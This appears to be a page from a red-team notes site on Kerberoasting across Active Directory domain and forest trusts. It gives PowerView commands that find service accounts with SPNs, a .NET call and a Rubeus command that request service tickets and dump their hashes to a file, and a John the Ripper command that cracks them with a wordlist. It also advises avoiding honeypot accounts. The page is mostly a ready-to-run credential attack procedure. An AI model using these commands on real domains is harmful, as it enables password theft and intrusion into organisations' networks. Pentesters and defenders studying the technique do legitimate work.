kerberoast

Methodology

Enumerate what user account running as a service account we want to kerberoast.
Make sure it's not a honey pot account.
Make sure is a user made account, we don't want machine accounts since they have long passwords.
Kerberoast the user account.
Crack the ticket.

[!INFO] Accross domain/forests trusts there is no need to use /opsec, AES256 is not used by default so no downgrade encryption needed!

Powershell

[!INFO] Remember to follow the Powershell methodology

PowerView

Find users that have an SPN set:

Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}

Request a TGS accross trusts:

Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList MSSQLSvc/eu-file.eu.local@eu.local

Binaries

[!INFO] Remember to follow the Binaries methodology

Rubeus

Request a TGS accross trusts:

Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:euhashes.txt

Check for TGS

klist

Ticket Crack

https://www.openwall.com/john/k/john-1.9.0-jumbo-1-win64.zip

Using John:

john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=rockyou.txt euhashes.txt

Previousconstrained-delegation Nextpam-trust

Last updated 1 month ago